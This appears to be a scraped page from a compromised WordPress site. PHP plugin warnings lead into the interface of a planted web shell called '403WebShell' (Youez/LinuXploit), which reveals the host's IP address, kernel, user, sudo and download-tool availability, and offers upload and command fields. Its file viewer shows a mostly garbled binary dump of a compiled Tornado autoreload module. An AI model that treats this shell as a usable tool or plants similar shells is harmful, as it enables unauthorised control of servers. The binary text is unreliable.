Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560
[2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85
[3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50
[4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13
[5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
403WebShell
403Webshell
Server IP : 94.177.8.99  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /nuitka/eggshell.build/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /nuitka/eggshell.build/module.tornado.autoreload.const
��
�ioloop�.��
�IOLoop�.���current�.��
�	_io_loops�.���gen_log�.���warning�.��C�=tornado.autoreload started more than once in the same process���.���partial�.���_reload_on_update�.���PeriodicCallback�.��	�start�.�����Begins watching source files for changes.

    .. versionchanged:: 5.0
       The ``io_loop`` argument (deprecated since version 4.1) has been removed.
    �.���add_callback�.�����Wait for a watched file to change, then restart the process.

    Intended to be used at the end of scripts like unit test runners,
    to run the tests again after any source file changes (but see also
    the command-line interface in `main`)
    �.���_watched_files�.���add�.��X�TAdd a file to the watch list.

    All imported modules are watched by default.
    �.���
_reload_hooks�.��
�append�.��
XAdd a function to be called before reloading the process.

    Note that for open file and socket handles it is generally
    preferable to set the ``FD_CLOEXEC`` flag (using `fcntl` or
    `os.set_inheritable`) instead of using a reload hook to close them.
    �.���_reload_attempted�.���process�.���task_id�.���sys�.���modules�.��
�values�.��	�types�.���
ModuleType�.���__file__�.���endswith�.��
�.pyc���.��
�.pyo���.��!�builtins��slice���NJ����N��R�.���_check_file�.���modify_times�.���path�.���os�.���stat�.���st_mtime�.���info�.��"�%s modified; restarting server�.���_reload�.��
�signal�.��
�	setitimer�.���ITIMER_REAL�.�K.���_autoreload_is_main�.���_original_argv�.���_original_spec�.���__main__�.���__spec__�.���argv�.���-m�.���name�.��h%KNN��R�.���.�.���pathsep�.����.���environ�.���get�.���
PYTHONPATH�h@��.���
startswith�.���path_prefix�.���
PYTHONPATH�.���
_has_execv�.���
subprocess�.��	�Popen�.���
executable�.��	�_exit�.��K��.��	�execv�.��
�spawnv�.���P_NOWAIT�.���tornado.autoreload�.���
autoreload�.��
h%NNN��R�.�K.��
�module�.�K.��h%KKN��R�.��
�script�.��	�print�.��
�_USAGE�.��
�file���.���exit�.��K��.���mode�.��	�runpy�.���
run_module�.��(}�(�run_name��__main__��	alter_sys��u.��
�	__enter__�.���__exit__�.���__package__�.���exec_in�.���read�.��NNN��.�� �Script exited with status %s�.���code�.��,�%Script exited with uncaught exception����.���exc_info���.��
�	traceback�.���
extract_tb�.�hp.��*�&too many values to unpack (expected 4)�.��	�watch�.���filename�.���Script exited normally���.���pkgutil�.���
get_loader�.���get_filename�.���wait�.��XCommand-line wrapper to re-run a script whenever its source changes.

    Scripts may be specified by filename or module name::

        python -m tornado.autoreload -m tornado.test.runtests
        python -m tornado.autoreload tornado/test/runtests.py

    Running a script with this wrapper is similar to calling
    `tornado.autoreload.wait` at the end of the script, but this wrapper
    can catch import-time problems like syntax errors that would otherwise
    prevent the script from reaching its call to `wait`.
    �.��>X7Automatically restart the server when a source file is modified.

Most applications should not access this module directly.  Instead,
pass the keyword argument ``autoreload=True`` to the
`tornado.web.Application` constructor (or ``debug=True``, which
enables this setting and several others).  This will enable autoreload
mode as well as checking for changes to templates and static
resources.  Note that restarting is a destructive operation and any
requests in progress will be aborted when the process restarts.  (If
you want to disable autoreload while using other debug-mode features,
pass both ``debug=True`` and ``autoreload=False``).

This module can also be used as a command-line wrapper around scripts
such as unit test runners.  See the `main` method for details.

The command-line wrapper and Application debug modes can be used together.
This combination is encouraged as the wrapper catches syntax errors and
other import-time failures, while debug mode catches changes once
the server has started.

This module will not work correctly when `.HTTPServer`'s multi-process
mode is used.

Reloading loses any Python interpreter command-line arguments (e.g. ``-u``)
because it re-executes Python using ``sys.executable`` and ``sys.argv``.
Additionally, modifying these variables will cause reloading to behave
incorrectly.

�.���__doc__�.��@�</usr/local/lib/python3.8/dist-packages/tornado/autoreload.py�.��
�origin�.���has_location�.���
__cached__�.��
�	functools�.���weakref�.���tornado�.��h��.���tornado.log�.��h��.��h��.���tornado.util�.��hi��.��
�typing�.���Callable�.���Dict�.���WeakKeyDictionary�.��M���.��&}�(�
check_time�h#�int����return�Nu.��}�h�Ns.��}�(hvh#�str���h�Nu.���fn�.��]�N��.�h�.���add_reload_hook�.��h�h#�float�����.����|Usage:
  python -m tornado.autoreload -m module.to.run [args...]
  python -m tornado.autoreload path/to/script.py [args...]
�.���main�.���<module tornado.autoreload>�.��h)h*�modified���.��(h��spec�h9hFt�.��h)�module�h*��.��h���.��b(�tornado��
original_argv��
original_spec�h_h��script�h`�f��e�hv�lineno�h;�line��loader�t�.��)(h��io_loop�h)�callback��	scheduler�t�.��h���.��hv��.

Youez - 2016 - github.com/yon3zu
LinuXploit